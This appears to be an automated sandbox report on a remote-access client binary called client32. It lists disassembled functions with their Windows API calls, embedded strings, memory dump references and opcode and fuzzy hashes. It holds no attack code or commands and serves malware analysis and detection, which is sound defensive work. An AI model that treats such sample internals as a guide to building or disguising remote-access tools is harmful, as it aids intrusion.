                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                • String ID:
                                                                                • API String ID: 1094208222-0
                                                                                • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                • Opcode Fuzzy Hash: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                Function 1100D4C0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                                • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                                • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                                • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                                • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                                • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                                • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                                • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                                • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                                • Opcode Fuzzy Hash: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                                Function 1109D980 Relevance: 13.6, APIs: 9, Instructions: 63fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • UnmapViewOfFile.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D98F
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9A9
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9B6
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9C3
                                                                                • SetEvent.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9D5
                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9DF
                                                                                • SetEvent.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9F1
                                                                                • CloseHandle.KERNEL32(?,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109D9FB
                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,00000000,1109E186,?,?,1109ECDF,00000064,00000006,?,11067720,0000048C,00000001,00000000,NSMWClass), ref: 1109DA08
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$Event$FileUnmapView
                                                                                • String ID:
                                                                                • API String ID: 2427653990-0
                                                                                • Opcode ID: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                • Instruction ID: ef7400aadcbdc77f3d4b8b656ca31cdf014edcd8fc82e503e85a70b1789423f5
                                                                                • Opcode Fuzzy Hash: 1acc1433f5a53ddd11cd649e4de06c5f5174080ef02ec046c8e85dcc12a9f492
                                                                                • Instruction Fuzzy Hash: 7B11ECB1A407489BD730EFAAC9D481AFBF9AF583043514D7EE19AC3A10C634E8489B50
                                                                                Function 11043240 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 244COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • _memset.LIBCMT ref: 110433A9
                                                                                • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsSystem$__wcstoi64_memset
                                                                                • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                • API String ID: 3760389471-710950153
                                                                                • Opcode ID: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                                • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                • Opcode Fuzzy Hash: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                                • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                                Function 1101F4D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 199COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
                                                                                • GetBkColor.GDI32(?), ref: 1101F5BE
                                                                                • GetTextColor.GDI32(?), ref: 1101F645
                                                                                  • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
                                                                                  • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
                                                                                  • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
                                                                                  • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
                                                                                  • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
                                                                                  • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
                                                                                  • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
                                                                                • String ID: VUUU$VUUU
                                                                                • API String ID: 179481525-3149182767
                                                                                • Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                • Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
                                                                                • Opcode Fuzzy Hash: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                • Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94
                                                                                Function 1103B420 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 141COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1103B476
                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Directory$FolderPathSystemWindows
                                                                                • String ID: "%PROG%$%SYS%$%WIN%$c:\program files
                                                                                • API String ID: 1538031420-1992112792
                                                                                • Opcode ID: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
                                                                                • Instruction ID: 2623f2ed80b282b5754acc89838a0d53b3ad1afe3f6d6f3bb9299b9b15bf7866
                                                                                • Opcode Fuzzy Hash: e9a016464172d398cdd25842ee37a2f59ed83bca3c4f484902448cdd84f2952e
                                                                                • Instruction Fuzzy Hash: 50412775E0461A5FCB15CE348C94BEAB7E9EF8930DF0041E8E899D7644EBB59944CB80
                                                                                Function 110B78A0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 141synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • Part of subcall function 110B0730: _memset.LIBCMT ref: 110B073C
                                                                                  • Part of subcall function 110B0730: _memset.LIBCMT ref: 110B076D
                                                                                  • Part of subcall function 110B0FA0: timeGetTime.WINMM(_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B0FA6
                                                                                  • Part of subcall function 110B0FA0: timeGetTime.WINMM(111F10F8,111E6C98,?), ref: 110B1075
                                                                                • WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B790D
                                                                                • GetDC.USER32(00000000), ref: 110B7951
                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B795C
                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7967
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110B7973
                                                                                  • Part of subcall function 110B3560: SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                                  • Part of subcall function 110B3560: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                                  • Part of subcall function 110B3560: CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                                  • Part of subcall function 110B3560: CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                                  • Part of subcall function 110B3560: WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                                  • Part of subcall function 110B3560: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
                                                                                • String ID: TraceScrape$_debug
                                                                                • API String ID: 2936113293-4091781993
                                                                                • Opcode ID: c0a2ef568abd564d7af5b6c1d30ae4c0d865c04e90584bcac43ba32ef6f36e6b
                                                                                • Instruction ID: beb9be5f3decd216f1517493ed5af73f7f61b8e2793af04975b89e9167c73652
                                                                                • Opcode Fuzzy Hash: c0a2ef568abd564d7af5b6c1d30ae4c0d865c04e90584bcac43ba32ef6f36e6b
                                                                                • Instruction Fuzzy Hash: 5F41C779E042465BEB05CFA4C9C1FAF7BB5EB88704F1405A8E805AB285EA70ED04C7E4
                                                                                Function 11061710 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
                                                                                • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
                                                                                • RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
                                                                                • RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Create$CritiusernitializeSection_malloc_memsetwsprintf
                                                                                • String ID: ConfigList$PCICTL
                                                                                • API String ID: 4014706405-1939909508
                                                                                • Opcode ID: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                                • Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
                                                                                • Opcode Fuzzy Hash: 2c662ba8e1a73180234ba1d403ad4cf72de73a80d5c76a4c65f103bbd16af89e
                                                                                • Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50
                                                                                Function 1103B8B0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 136windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • IsWindow.USER32(?), ref: 1103B8E8
                                                                                • _malloc.LIBCMT ref: 1103B97B
                                                                                • _memmove.LIBCMT ref: 1103B9E0
                                                                                • SendMessageTimeoutA.USER32(?,0000004A,00040310,00000007,00000002,00002710,?), ref: 1103BA40
                                                                                • _free.LIBCMT ref: 1103BA47
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$ErrorExitLastProcessSendTimeoutWindow_free_malloc_memmovewsprintf
                                                                                • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                • API String ID: 3610575347-2270926670
                                                                                • Opcode ID: 3ad59114b4505d2ff10dfcd5b1565abec2c6f4394dd92e1c2ff375fd271c0bfb
